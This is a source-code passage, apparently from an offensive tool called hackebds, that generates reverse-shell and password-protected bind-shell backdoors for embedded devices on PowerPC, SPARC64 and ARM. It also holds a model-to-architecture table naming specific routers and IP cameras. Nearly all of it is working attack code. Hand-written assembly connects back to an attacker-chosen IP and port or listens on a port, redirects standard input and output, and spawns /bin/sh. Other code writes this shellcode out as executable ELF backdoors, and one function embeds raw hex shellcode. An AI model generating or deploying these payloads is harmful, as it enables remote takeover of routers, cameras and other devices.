		envp = my_package.get_envir_args(envp)

	#print(shellcode%(handle_port, handle_ip_3, handle_ip_2, handle_ip_1, handle_ip_0))
	#shellcode = asm(shellcode%(handle_port, handle_ip_3, handle_ip_2, handle_ip_1, handle_ip_0))
	shellcode = asm(shellcode%(handle_port_2 , handle_port_1, handle_ip_0, handle_ip_2, handle_ip_2, handle_ip_3))

	ELF_data = make_elf(shellcode)
	if(filename==None):
		log.info("waiting 3s")
		sleep(1)
		filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,my_package.chars)
		f=open(filename,"wb")
		f.write(ELF_data)
		f.close()
		os.chmod(filename, 0o755)
		log.success("{} is ok in current path ./".format(filename))
		context.arch = 'i386'
		context.bits = "32"
		context.endian = "little"
	else:
		if(os.path.exists(filename) != True):
			log.info("waiting 3s")
			sleep(1)
			f=open(filename,"wb")
			f.write(ELF_data)
			f.close()
			os.chmod(filename, 0o755)
			log.success("{} generated successfully".format(filename))
			context.arch='i386'
			context.bits="32"
			context.endian="little"
		else:
			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
			choise = input()
			if choise == "y\n" or choise == "\n":
				log.info("waiting 3s")
				sleep(1)
				f=open(filename,"wb")
				f.write(ELF_data)
				f.close()
				os.chmod(filename, 0o755)
				log.success("{} generated successfully".format(filename))
				context.arch='i386'
				context.bits="32"
				context.endian="little"
			else:
				return 

def ppc64_reverse_sl(reverse_ip, reverse_port, filename=None):
	context.arch = 'powerpc64'
	context.endian = 'big'
	context.bits = '64'
	log.success("reverse_ip is: "+ reverse_ip)
	log.success("reverse_port is: "+str(reverse_port))
	reverse_ip = reverse_ip.split('.')
	handle_ip_0="0x"+enhex(p8(int(reverse_ip[0])))
	handle_ip_1="0x"+enhex(p8(int(reverse_ip[1])))
	handle_ip_2="0x"+enhex(p8(int(reverse_ip[2])))
	handle_ip_3="0x"+enhex(p8(int(reverse_ip[3])))
	handle_port='0x'+enhex(p16(reverse_port))
	shellcode = '''
	mr    r31,r1
	li    r3,2
	li    r4,1
	li    r5,0
	li    r0,0x146
	sc
	mr    r17,r3
	xor   r9,r9,r9
	stw   r9, 28(r31)
	stw   r9, 32(r31)
	stw   r9, 36(r31)
	stw   r9, 36(r31)
	stw   r9, 40(r31)
	stw   r9, 44(r31)
	stw   r9, 48(r31)
	stw   r9, 52(r31)
	stw   r9, 56(r31)
	stw   r9, 4(r31)
	stw   r9, 8(r31)
	li    r9, 2
	sth   r9, 28(r31)
	li    r9, %s
	sth   r9, 30(r31)
	li    r9, %s
	stb   r9, 32(r31)
	li    r9, %s
	stb   r9, 33(r31)
	li    r9, %s
	stb   r9, 34(r31)
	li    r9, %s
	stb   r9, 35(r31)
	addi   r4, r31, 0x1c
	mr    r3, r17
	li    r5, 0x10
	li    r0, 0x148
	sc
	xor   r5, r5, r5
	mr    r3,r17
	li    r4,0
	li    r0,0x3f
	sc
	mr    r3,r17
	li    r4,1
	sc
	mr    r3,r17
	li    r4,2
	sc
	li    r9, 0x2f62
	sth   r9, 48(r31)
	li    r9, 0x696e
	sth   r9, 50(r31)
	li    r9, 0x2f73
	sth   r9, 52(r31)
	li    r9, 0x6800
	sth   r9, 54(r31)
	addi  r3, r31,0x30
	std  r3, 0(r31)
	mr    r4, r31
	xor   r5, r5, r5
	li    r0, 0xb
	sc
	'''
	shellcode = shellcode%(handle_port, handle_ip_0, handle_ip_1, handle_ip_2, handle_ip_3)
	shellcode = asm(shellcode)
	shellcode_len=len(shellcode)
	shellcode_hex=''
	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
	if "\\x00" in shellcode_hex:
		#log.info("waiting 3s")
		#sleep(1)
		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
		log.info("the null byte in %d"%(int(shellcode.index(b"\x00"))))
		print(shellcode_hex)
		context.arch='i386'
		context.bits="32"
		context.endian="little"
		return shellcode
	else:
		#log.info("waiting 3s")
		#sleep(1)
		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
		print(shellcode_hex)
		context.arch='i386'
		context.bits="32"
		context.endian="little"
		return shellcode


def powerpc_bind_shell(listen_port , passwd, filename= None):
	context.arch = 'powerpc'
	context.endian = 'big'
	context.bits = '32'
	log.success("bind port is set to "+ str(listen_port))
	log.success("passwd is set to '%s'"%passwd )
	#print(listen_port)
	handle_port='0x'+enhex(p16(listen_port))
	#print(handle_port)
	passwd_len = hex(len(passwd))
	passwd = "0x"+enhex(p32(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).ljust(8,"0")
	passwd_high = passwd[:6]
	passwd_low  = "0x"+passwd[6:10]
	shellcode = '''
	mr    r31,r1
	li    r3,2
	li    r4,1
	li    r5,0
	li    r0,0x146
	sc
	mr    r17,r3
	xor   r9,r9,r9
	stw   r9, 28(r31)
	stw   r9, 32(r31)
	stw   r9, 36(r31)
	stw   r9, 36(r31)
	stw   r9, 40(r31)
	stw   r9, 44(r31)
	stw   r9, 48(r31)
	stw   r9, 52(r31)
	stw   r9, 56(r31)
	stw   r9, 4(r31)
	stw   r9, 8(r31)
	li    r9, 2
	sth   r9, 28(r31)
	li    r9, %s
	sth   r9, 30(r31)
	stw   r5, 32(r31)
	addi  r4, r31, 0x1c
	li   r5, 0x10
	li   r0, 0x147
	sc
	xor  r5, r5, r5
	mr   r3, r17
	li   r4, 0x101
	li   r0, 0x149
	sc
	mr   r3, r17
	li   r4, 0
	li   r5, 0
	li   r0, 0x14a
	sc
	mr   r16, r3
	li   r4, 0
	li   r0, 0x3f
	sc
	mr   r3, r16
	li   r4, 1
	sc
	mr   r3, r16
	li   r4, 2
	sc
	lis  r9, 0x5061
	ori  r9, r9, 0x7373
	stw  r9, -20(r31)
	lis  r9, 0x7764
	ori  r9, r9, 0x3a20
	stw  r9, -16(r31)
	li   r3, 1
	addi r4, r31 ,-20
	li   r5, 8
	li   r0, 4
	sc
	lis  r20, %s
	ori  r20, r20, %s
	li   r0, 3
	li   r3, 0
	addi r4, r31, -32
	li   r5, %s
	sc
	lwz    r10, -32(r31)
	cmpw   cr7, r10,r20
	bne    cr7, 0x30;
	lis    r9, 0x2f62
	ori    r9, r9, 26990
	stw   r9, 48(r31)
	xor  r9, r9, r9
	lis    r9, 0x2f73
	ori   r9, r9, 26624
	stw   r9, 52(r31)
	addi  r3, r31,0x30
	stwu  r3, 0(r31)
	mr    r4, r31
	xor   r5, r5, r5
	li    r0, 0xb
	sc
	'''
	shellcode = shellcode%(handle_port, passwd_high, passwd_low, passwd_len)#, passwd_low, passwd_high, passwd_len)
	shellcode = asm(shellcode)
	ELF_data = make_elf(shellcode)
	if(filename==None):
		log.info("waiting 3s")
		sleep(1)
		filename=context.arch + "-bind_shell-" + my_package.random_string_generator(4,my_package.chars)
		f=open(filename,"wb")
		f.write(ELF_data)
		f.close()
		os.chmod(filename, 0o755)
		log.success("{} is ok in current path ./".format(filename))
		context.arch = 'i386'
		context.bits = "32"
		context.endian = "little"
	else:
		if(os.path.exists(filename) != True):
			log.info("waiting 3s")
			sleep(1)
			f=open(filename,"wb")
			f.write(ELF_data)
			f.close()
			os.chmod(filename, 0o755)
			log.success("{} generated successfully".format(filename))
			context.arch='i386'
			context.bits="32"
			context.endian="little"
		else:
			print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) ",end='')
			choise = input()
			if choise == "y\n" or choise == "\n":
				log.info("waiting 3s")
				sleep(1)
				f=open(filename,"wb")
				f.write(ELF_data)
				f.close()
				os.chmod(filename, 0o755)
				log.success("{} generated successfully".format(filename))
				context.arch='i386'
				context.bits="32"
				context.endian="little"
			else:
				return 


import os
from pwn import log,shellcraft
import platform
from colorama import Fore,Back,Style
from multidict import CIMultiDict
'''
Equipment model -> backdoor model
This is a learning module. After the generation, add the device model. The tool will remember it after the next use, accelerating the generation of the backdoor and shell code next time

1 arch 0 model 1
2 arch
'''


model_tree=CIMultiDict()
model_tree["RV340"] = "armelv7"
model_tree["RV160"] = "armelv7"
model_tree["DCS-5010L"] = "mipsel"
model_tree["RV340"] = "armelv7"



def get_system_version():
	return platform.system()



def touchfile():
	try:
	#with open("/tmp/hackebds_model_table",'w') as f:
	#f.write()
		system_version = get_system_version()
		if system_version=="Linux":
			log.success("Creating contact file")
			os.mknod("/tmp/hackebds_model_table")
		elif system_version == "Darwin" or  system_version =="Mac":
			log.success("Creating contact file")
			f=open("/tmp/hackebds_model_table",'w+')
			f.close()
		elif system_version == "Windows":
			log.info("This function is not applicable to this system")
	except Exception as e:
		log.error("error "+e)

def dict_to_txt(dic1):
	try:
		with open('/tmp/hackebds_model_table', 'w') as dict_f:
			for k, v in dic1.items():
				dict_f.write(str(k) + ' ' + str(v) + '\n')
	except Exception as e:
		pass
		#log.success("error "+ e)

def txt_to_dict():
	global model_tree
	try:
		with open('/tmp/hackebds_model_table', 'r') as dict_f:
			for line in dict_f.readlines():
					line=line.strip()
					k,v=line.split(' ')
					model_tree[k]=str(v)
	except Exception as e:
		pass
		#log.error("error "+ e)


def append_to_tree(model, arch):
	global model_tree
	txt_to_dict()
	model_tree[model]=arch
	dict_to_txt(model_tree)

def model_to_arch(model):
	txt_to_dict()
	#print(model_tree)
	return model_tree[model]

def print_mmodel_dic():
	try:
		dict_2 = dict(sorted(model_tree.items(), key=lambda i:i[0]))
		#print(dict_2)
		log.success("model ----> arch:")

		for key,value in dict_2.items():
			print("-"*0x29)
			print("|"+Fore.GREEN+key.ljust(15)+Fore.RESET+"----->    "+Fore.GREEN+value.ljust(14)+Fore.RESET+"|")

		print("-"*0x29)	

	except Exception as e:
		print(e)



#append_to_tree("DIR-816",'mips')
#print(model_to_arch("DIR-832"))


from pwn import *
'''
11.17 add sparc32 ,powerpc don't exam
socket 0xce
connect 0x62
dup2  0x5A
execve  0x3B
bind
listen
add 11.24 sparc64_big_backdoor
'''
from colorama import Fore,Back,Style
from . import extract_shellcode
from . import my_package

def sparc64_backdoor(shell_path ,reverse_ip ,reverse_port, envp ,filename = None):
    context.arch = 'sparc64'
    context.endian = 'big'
    context.bits = '64'
    log.success("reverse_ip is: "+ reverse_ip)
    log.success("reverse_port is: "+str(reverse_port))
    reverse_ip = reverse_ip.split('.')
    reverse_ip_1 = "0x"+enhex(p8(int(reverse_ip[0])))
    reverse_ip_2 = "0x"+enhex(p8(int(reverse_ip[1])))
    reverse_ip_3 = "0x"+enhex(p8(int(reverse_ip[2])))
    reverse_ip_4 = "0x"+enhex(p8(int(reverse_ip[3])))
    handle_port = hex(p16(reverse_port)[0])
    handle_port_1 = hex(p16(reverse_port)[1])
    shellcode = '''
    mov  0, %o2
    mov  1, %o1
    mov  2, %o0
    save   %sp,  -208,  %sp
    stx    %g1,  [ %fp + 0x7f7 ]
    clr    %g1
    mov    1,  %o0
    stx    %i0,  [ %fp + 0x7df ]
    stx    %i1,  [ %fp + 0x7e7 ]
    stx    %i2,  [ %fp + 0x7ef ]
    add    %fp,  0x7df,  %o1
    mov  0xce, %g1
    ta   0x10
    mov  %o0, %l0
    mov  {} , %g1 
    stb   %g1 , [%sp + 4 ]
    mov  {},  %g1
    stb   %g1 , [%sp + 5 ]
    mov  {},  %g1
    stb   %g1 , [%sp + 6 ]
    mov  {},  %g1
    stb   %g1 , [%sp + 7 ]
    mov  0 ,  %g1
    stb  %g1,   [%sp]
    mov  2,   %g1
    stb  %g1,   [%sp+1]
    mov   {}, %g1
    stb   %g1,  [%sp + 2]
    mov   {}, %g1
    stb   %g1,  [%sp + 3]
    mov  %sp, %o1
    mov  0x10,%o2
    mov  0x62,%g1
    ta   0x10
    mov  %l0, %o0
    mov  0,  %o1
    mov  0x5a, %g1
    ta   0x10
    mov  %l0, %o0
    mov  1,  %o1
    mov  0x5a, %g1
    ta   0x10
    mov  %l0, %o0
    mov  2,  %o1
    mov  0x5a, %g1
    ta   0x10
    '''
    if shell_path == "/bin/sh" or shell_path == "sh":
        shellcode += '''
        sethi  0xbd89a, %g2
        or     %g2, 0x16e, %g2
        sethi  %hi(0x2f736800), %g3
        st     %g2, [%sp + 0x20]
        st   %g3, [%sp + 0x24]
        set  0x2d69 , %g2
        st   %g2, [%sp + 0x28] 
        mov  0,  %g3
        add  %sp, 0x20, %g1
        mov  %g1, %o0
        stx   %g1, [%sp]
        add  %sp, 0x2a, %g1
        stx   %g1,  [%sp +8]
        stx   %g3, [%sp +16]
        mov  %sp, %o1
        mov  %g3, %o2
        mov  0x3b, %g1
        ta   0x10
        '''
    elif shell_path == "/bin/bash" or shell_path == "bash":
        shellcode += '''
        set  0x2F62696E, %g2
        set  0x2F626173, %g3
        st   %g2, [%sp + 0x20]
        st   %g3, [%sp + 0x24]
        mov  0x68, %g1
        stb  %g1, [%sp + 0x28]
        set  0x2d69 , %g2
        st   %g2, [%sp + 0x30]
        mov  0,  %g3
        add  %sp, 0x20, %g1
        mov  %g1, %o0
        stx   %g1, [%sp]
        add  %sp, 0x32, %g1
        stx   %g1,  [%sp +8]
        stx   %g3, [%sp +16]
        mov  %sp, %o1
        mov  %g3, %o2
        mov  0x3b, %g1
        ta   0x10
        '''
    else:
        log.info("now shell is only support sh and bash")
        return 
    if(envp == None):
        envp = 0
    else:
        envp = my_package.get_envir_args(envp)

    shellcode = asm(shellcode.format(reverse_ip_1, reverse_ip_2, reverse_ip_3, reverse_ip_4, handle_port, handle_port_1))
    ELF_data = make_elf(shellcode)
    if(filename==None):
        log.info("waiting 3s")
        sleep(1)
        filename=context.arch + "-backdoor-" + my_package.random_string_generator(4,my_package.chars)
        f=open(filename,"wb")
        f.write(ELF_data)
        f.close()
        os.chmod(filename, 0o755)
        log.success("{} is ok in current path ./".format(filename))
        context.arch = 'i386'
        context.bits = "32"
        context.endian = "little"
    else:
        if(os.path.exists(filename) != True):
            log.info("waiting 3s")
            sleep(1)
            f=open(filename,"wb")
            f.write(ELF_data)
            f.close()
            os.chmod(filename, 0o755)
            log.success("{} generated successfully".format(filename))
            context.arch='i386'
            context.bits="32"
            context.endian="little"
        else:
            print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
            choise = input()
            if choise == "y\n" or choise == "\n":
                log.info("waiting 3s")
                sleep(1)
                f=open(filename,"wb")
                f.write(ELF_data)
                f.close()
                os.chmod(filename, 0o755)
                log.success("{} generated successfully".format(filename))
                context.arch='i386'
                context.bits="32"
                context.endian="little"
            else:
                return  

'''
12.18 sparc64 bind shell
socket 0xce
connect 0x62
dup2  0x5A
execve  0x3B
bind
listen
add 11.24 sparc64_big_backdoor
'''


def sparc64_bind_shell(bindport, passwd, filename=None):
    context.arch = 'sparc64'
    context.endian = 'big'
    context.bits = '64'
    log.success("bind_port is: "+ str(bindport))
    log.success("reverse_port is: "+str(passwd))
    handle_port = hex(p16(bindport)[0])
    handle_port_1 = hex(p16(bindport)[1])
    passwd_len = len(passwd)
    passwd = '0x'+enhex(passwd.encode())
    passwd = passwd.ljust(10,'0')
    shellcode = '''
    mov  0, %o2
    mov  1, %o1
    mov  2, %o0
    save   %sp,  -208,  %sp
    stx    %g1,  [ %fp + 0x7f7 ]
    clr    %g1
    mov    1,  %o0
    stx    %i0,  [ %fp + 0x7df ]
    stx    %i1,  [ %fp + 0x7e7 ]
    stx    %i2,  [ %fp + 0x7ef ]
    add    %fp,  0x7df,  %o1
    mov  0xce, %g1
    ta   0x10
    mov  %o0, %l0
    mov  0 , %g1 
    st   %g1 , [%sp + 4 ]
    mov  0 ,  %g1
    stb  %g1,   [%sp]
    mov  2,   %g1
    stb  %g1,   [%sp+1]
    mov   {}, %g1
    stb   %g1,  [%sp + 2]
    mov   {}, %g1
    stb   %g1,  [%sp + 3]
    mov  %sp, %o1
    mov  0x10, %o2
    stx   %o0,   [%sp-0x38]
    stx   %o1,  [%sp-0x30]
    stx   %o2,  [%sp-0x28]
    sub  %o1, 0x38, %o1    
    mov  2,%o0
    mov  0xce,%g1
    ta   0x10
    mov  0,  %o2
    stx  %o2,   [%sp-0x30]
    stx  %o2,   [%sp-0x28]
    mov  0,  %o3
    mov  3,  %o4
    mov  4,   %o0
    ta   0x10
    mov  0x63, %g1
    mov  %l0, %o0
    mov  0,  %o1
    mov  0, %o2
    ta  0x10
    mov  %o0, %l0
    mov  %l0, %o0
    mov  0,  %o1
    mov  0x5a, %g1
    ta   0x10
    mov  %l0, %o0
    mov  1,  %o1
    mov  0x5a, %g1
    ta   0x10
    mov  %l0, %o0
    mov  2,  %o1
    mov  0x5a, %g1
    ta   0x10
    set  0x50617373, %g2
    set  0x77643A00, %g3
    std  %g2, [%sp+64]
    mov  1,  %o0
    add  %sp, 64, %o1
    mov  8,  %o2
    mov  4,  %g1
    ta   0x10
    mov  0, %o0
    add  %sp, 88, %o1
    mov  {}, %o2
    mov   3, %g1
    ta   0x10
    set  {}, %l4
    ld   [%sp +88], %o7
    cmp  %o7, %l4
    '''

    shellcode_execve = '''
    sethi  0xbd89a, %g2
    or     %g2, 0x16e, %g2
    sethi  %hi(0x2f736800), %g3
    st     %g2, [%sp + 0x20]
    st   %g3, [%sp + 0x24]
    mov  0,  %g3
    add  %sp, 0x20, %g1
    mov  %g1, %o0
    stx   %g1, [%sp]
    stx   %g3, [%sp +8]
    mov  %sp, %o1
    mov  %g3, %o2
    mov  0x3b, %g1
    ta   0x10
    '''
    shellcode = asm(shellcode.format(handle_port, handle_port_1, passwd_len, passwd))
    shellcode += b'\x12\x68\x00\x06\x01\x00\x00\x00'
    shellcode += asm(shellcode_execve)
    ELF_data = make_elf(shellcode)
    if(filename==None):
        log.info("waiting 3s")
        sleep(1)
        filename=context.arch + "-bind_shell-" + my_package.random_string_generator(4,my_package.chars)
        f=open(filename,"wb")
        f.write(ELF_data)
        f.close()
        os.chmod(filename, 0o755)
        log.success("{} is ok in current path ./".format(filename))
        context.arch = 'i386'
        context.bits = "32"
        context.endian = "little"
    else:
        if(os.path.exists(filename) != True):
            log.info("waiting 3s")
            sleep(1)
            f=open(filename,"wb")
            f.write(ELF_data)
            f.close()
            os.chmod(filename, 0o755)
            log.success("{} generated successfully".format(filename))
            context.arch='i386'
            context.bits="32"
            context.endian="little"
        else:
            print(Fore.RED+"[+]"+" be careful File existence may overwrite the file (y/n) "+Fore.RESET,end='')
            choise = input()
            if choise == "y\n" or choise == "\n":
                log.info("waiting 3s")
                sleep(1)
                f=open(filename,"wb")
                f.write(ELF_data)
                f.close()
                os.chmod(filename, 0o755)
                log.success("{} generated successfully".format(filename))
                context.arch='i386'
                context.bits="32"
                context.endian="little"
            else:
                return  


def sparc64_reverse_sl(reverse_ip, reverse_port, filename = None):
    pass


from pwn import *
import extract_shellcode

def armelv7_backdoor(reverse_ip,reverse_port,filename=None):
	context.arch='arm'
	context.endian='little'
	context.bits="32"
	basic_shellcode=asm(shellcraft.connect(reverse_ip,reverse_port))
	shellcode2='''
	mov r5,r6
	mov r0,r5
	mov r1,#0
	movw r7,#0x3f
	svc #0
	mov r0,r5
	mov r1,#1
	svc #0
	mov r0,r5
	mov r1,#2
	svc #0
	'''
	shellcode2=asm(shellcode2)
	shellcode3=asm(shellcraft.sh())
	all_reverseshell=basic_shellcode+shellcode2+shellcode3
	data=make_elf(all_reverseshell)
	if filename==None:
		filename="backdoor_armelv7"
		f=open(filename,"wb")
		f.write(data)
		f.close()
		#print disasm(all_reverseshell)
		print("backdoor_armelv7 is ok in current path ./")

def armelv7_reverse_sl(reverse_ip,reverse_port):
	context.arch='arm'
	context.endian='little'
	context.bits="32"
	shellcode='''
	.ARM
	eor r4,r4,r4
	%s
	strb r7,[sp,#-0x28]
	%s
	strb r7,[sp,#-0x27]
	%s
	strb r7,[sp,#-0x26]
	%s
	strb r7,[sp,#-0x25]
	mov r7,#2
	strb r7,[sp,#-0x2c]
	strb r4,[sp,#-0x2b]
	%s
	strb r7,[sp,#-0x2a]
	%s
	strb r7,[sp,#-0x29]
	strb r4,[sp,#-0x14]
	mov r7,#0x68
	strb r7,[sp,#-0x15]
	mov r7,#0x73
	strb r7,[sp,#-0x16]
	mov r7,#0x2f
	strb r7,[sp,#-0x17]
	mov r7,#0x6e
	strb r7,[sp,#-0x18]
	mov r7,#0x69
	strb r7,[sp,#-0x19]
	mov r7,#0x62
	strb r7,[sp,#-0x1a]
	mov r7,#0x2f
	strb r7,[sp,#-0x1b]
	add r4,sp,#-0x1b
	add r5,sp,#-0x2c
	add r3,pc,#1
	bx  r3
	.THUMB
	mov r1,#2
	mov r0,r1
	mov r1,#1
	eor r2,r2,r2
	mov r7,#200
	add r7,r7,#81
	svc #1
	mov r6,r0
	mov r1,r5
	mov r2,#0x10
	add r7,r7,#2
	svc #1
	mov r0,r6
	eor r1,r1,r1
	mov r7,#63
	svc #1
	mov r0,r6
	add r1,r1,#1
	svc #1
	mov r0,r6
	add r1,r1,#1
	svc #1
	mov r0,r4
	eor r1,r1,r1
	eor r2,r2,r2
	push {r0,r1}
	mov r1,sp
	mov r7,#0xb
	svc #1
	'''
	handle_ip=reverse_ip.split('.')
	handle_port=list(p16(reverse_port)[::-1])
	for i in range(len(handle_ip)):
		if handle_ip[i]!="0":
			handle_ip[i]="mov r7,#"+handle_ip[i]
		else:
			handle_ip[i]="eor r7,r7,r7"
	for i in range(len(handle_port)):
		if handle_port[i]!="\x00":
			handle_port[i]="mov r7,#"+str(u8(handle_port[i]))
		else:
			handle_port[i]="eor r7,r7,r7"

	shellcode=shellcode%(handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3],handle_port[0],handle_port[1])
	#print shellcode
	#str(u8(handle_port[0])),str(u8(handle_port[1])
	#handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3]
	shellcode=asm(shellcode)[:-2]
	shellcode_hex=''
	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
	shellcode_len=len(shellcode)
	if "\\x00" in shellcode_hex:
		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
		#print shellcode.index("\x00")
		log.info("the null byte in %d"%(shellcode.index("\x00")))
		print(shellcode_hex)
		return shellcode
	else:
		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
		
		return shellcode


def armelv5_backdoor(reverse_ip,reverse_port,filename=None):
	context.bit="32"
	context.arch='arm'
	context.endian='little'
	shellcode  = '\x01\x30\x8F\xE2\x13\xFF\x2F\xE1\x02\x20\x01\x21\x52\x40\x64\x27'
	shellcode += '\xB5\x37\x01\xDF\x04\x1C\x0D\xA1\x4A\x70\x10\x22\x02\x37\x01\xDF'
	shellcode += '\x20\x1C\x49\x40\x3F\x27\x01\xDF\x20\x1C\x01\x31\x01\xDF\x20\x1C'
	shellcode += '\x01\x31\x01\xDF\x03\xA0\x52\x40\xC2\x71\x05\xB4\x69\x46\x0B\x27'
	shellcode += '\x01\xDF\x7F\x40\x2F\x62\x69\x6E\x2F\x73\x68\x41\x02\xAA\x11\x5C'
	shellcode += '\x14\x14\x0B\x0D'
	data = make_elf(shellcode)
	if filename==None:
		filename="backdoor_armelv5"
		f=open(filename,"wb")
		f.write(data)
		f.close()
		#print disasm(all_reverseshell)
		print("backdoor_armelv5 is ok in current path ./")

def armelv5_reverse_sl(reverse_ip,reverse_port):
	context.bits="32"
	context.arch='arm'
	context.endian='little'
	shellcode='''
	.ARM
	eor r4,r4,r4
	%s
	strb r7,[sp,#-0x28]
	%s
	strb r7,[sp,#-0x27]
	%s
	strb r7,[sp,#-0x26]
	%s
	strb r7,[sp,#-0x25]
	mov r7,#2
	strb r7,[sp,#-0x2c]
	strb r4,[sp,#-0x2b]
	%s
	strb r7,[sp,#-0x2a]
	%s
	strb r7,[sp,#-0x29]
	strb r4,[sp,#-0x14]
	mov r7,#0x68
	strb r7,[sp,#-0x15]
	mov r7,#0x73
	strb r7,[sp,#-0x16]
	mov r7,#0x2f
	strb r7,[sp,#-0x17]
	mov r7,#0x6e
	strb r7,[sp,#-0x18]
	mov r7,#0x69
	strb r7,[sp,#-0x19]
	mov r7,#0x62
	strb r7,[sp,#-0x1a]
	mov r7,#0x2f
	strb r7,[sp,#-0x1b]
	add r4,sp,#-0x1b
	add r5,sp,#-0x2c
	add r3,pc,#1
	bx  r3
	.THUMB
	mov r1,#2
	mov r0,r1
	mov r1,#1
	eor r2,r2,r2
	mov r7,#200
	add r7,r7,#81
	svc #1
	mov r6,r0
	mov r1,r5
	mov r2,#0x10
	add r7,r7,#2
	svc #1
	mov r0,r6
	eor r1,r1,r1
	mov r7,#63
	svc #1
	mov r0,r6
	add r1,r1,#1
	svc #1
	mov r0,r6
	add r1,r1,#1
	svc #1
	mov r0,r4
	eor r1,r1,r1
	eor r2,r2,r2
	push {r0,r1}
	mov r1,sp
	mov r7,#0xb
	svc #1
	'''
	handle_ip=reverse_ip.split('.')
	handle_port=list(p16(reverse_port)[::-1])
	for i in range(len(handle_ip)):
		if handle_ip[i]!="0":
			handle_ip[i]="mov r7,#"+handle_ip[i]
		else:
			handle_ip[i]="eor r7,r7,r7"
	for i in range(len(handle_port)):
		if handle_port[i]!="\x00":
			handle_port[i]="mov r7,#"+str(u8(handle_port[i]))
		else:
			handle_port[i]="eor r7,r7,r7"

	shellcode=shellcode%(handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3],handle_port[0],handle_port[1])
	#print shellcode
	#str(u8(handle_port[0])),str(u8(handle_port[1])
	#handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3]
	shellcode=asm(shellcode)[:-2]
	shellcode_hex=''
	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
	shellcode_len=len(shellcode)
	if "\\x00" in shellcode_hex:
		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
		log.info("the null byte in %d"%(shellcode.index("\x00")))
		print(shellcode_hex)
		return shellcode
	else:
		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
		print(shellcode_hex)
		return shellcode

def armebv7_reverse_sl(reverse_ip,reverse_port):
	context.bits="32"
	context.arch='arm'
	context.endian='big'
	shellcode='''
	.ARM
	eor r4,r4,r4
	%s
	strb r7,[sp,#-0x28]
	%s
	strb r7,[sp,#-0x27]
	%s
	strb r7,[sp,#-0x26]
	%s
	strb r7,[sp,#-0x25]
	mov r7,#2
	strb r7,[sp,#-0x29]
	strb r4,[sp,#-0x2a]
	%s
	strb r7,[sp,#-0x2b]
	%s
	strb r7,[sp,#-0x2c]
	strb r4,[sp,#-0x14]
	mov r7,#0x68
	strb r7,[sp,#-0x15]
	mov r7,#0x73
	strb r7,[sp,#-0x16]
	mov r7,#0x2f
	strb r7,[sp,#-0x17]
	mov r7,#0x6e
	strb r7,[sp,#-0x18]
	mov r7,#0x69
	strb r7,[sp,#-0x19]
	mov r7,#0x62
	strb r7,[sp,#-0x1a]
	mov r7,#0x2f
	strb r7,[sp,#-0x1b]
	add r4,sp,#-0x1b
	add r5,sp,#-0x2c
	add r3,pc,#1
	bx  r3
	.THUMB
	mov r1,#2
	mov r0,r1
	mov r1,#1
	eor r2,r2,r2
	mov r7,#200
	add r7,r7,#81
	svc #1
	mov r6,r0
	mov r1,r5
	mov r2,#0x10
	add r7,r7,#2
	svc #1
	mov r0,r6
	eor r1,r1,r1
	mov r7,#63
	svc #1
	mov r0,r6
	add r1,r1,#1
	svc #1
	mov r0,r6
	add r1,r1,#1
	svc #1
	mov r0,r4
	eor r1,r1,r1
	eor r2,r2,r2
	push {r0,r1}
	mov r1,sp
	mov r7,#0xb
	svc #1
	'''
	handle_ip=reverse_ip.split('.')[::-1]
	handle_port=list(p16(reverse_port))
	for i in range(len(handle_ip)):
		if handle_ip[i]!="0":
			handle_ip[i]="mov r7,#"+handle_ip[i]
		else:
			handle_ip[i]="eor r7,r7,r7"
	for i in range(len(handle_port)):
		if handle_port[i]!="\x00":
			handle_port[i]="mov r7,#"+str(u8(handle_port[i]))
		else:
			handle_port[i]="eor r7,r7,r7"

	shellcode=shellcode%(handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3],handle_port[0],handle_port[1])
	#print shellcode
	#str(u8(handle_port[0])),str(u8(handle_port[1])
	#handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3]
	shellcode=asm(shellcode)[:-2]
	shellcode_hex=''
	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
	shellcode_len=len(shellcode)
	if "\\x00" in shellcode_hex:
		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
		log.success("the null byte in %d"%shellcode.index("\x00"))
		print(shellcode_hex)
		return shellcode
	else:
		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
		print(shellcode_hex)
		return shellcode

def armebv5_reverse_sl(reverse_ip,reverse_port):
	context.bits="32"
	context.arch='arm'
	context.endian='big'
	shellcode='''
	.ARM
	eor r4,r4,r4
	%s
	strb r7,[sp,#-0x28]
	%s
	strb r7,[sp,#-0x27]
	%s
	strb r7,[sp,#-0x26]
	%s
	strb r7,[sp,#-0x25]
	mov r7,#2
	strb r7,[sp,#-0x29]
	strb r4,[sp,#-0x2a]
	%s
	strb r7,[sp,#-0x2b]
	%s
	strb r7,[sp,#-0x2c]
	strb r4,[sp,#-0x14]
	mov r7,#0x68
	strb r7,[sp,#-0x15]
	mov r7,#0x73
	strb r7,[sp,#-0x16]
	mov r7,#0x2f
	strb r7,[sp,#-0x17]
	mov r7,#0x6e
	strb r7,[sp,#-0x18]
	mov r7,#0x69
	strb r7,[sp,#-0x19]
	mov r7,#0x62
	strb r7,[sp,#-0x1a]
	mov r7,#0x2f
	strb r7,[sp,#-0x1b]
	add r4,sp,#-0x1b
	add r5,sp,#-0x2c
	add r3,pc,#1
	bx  r3
	.THUMB
	mov r1,#2
	mov r0,r1
	mov r1,#1
	eor r2,r2,r2
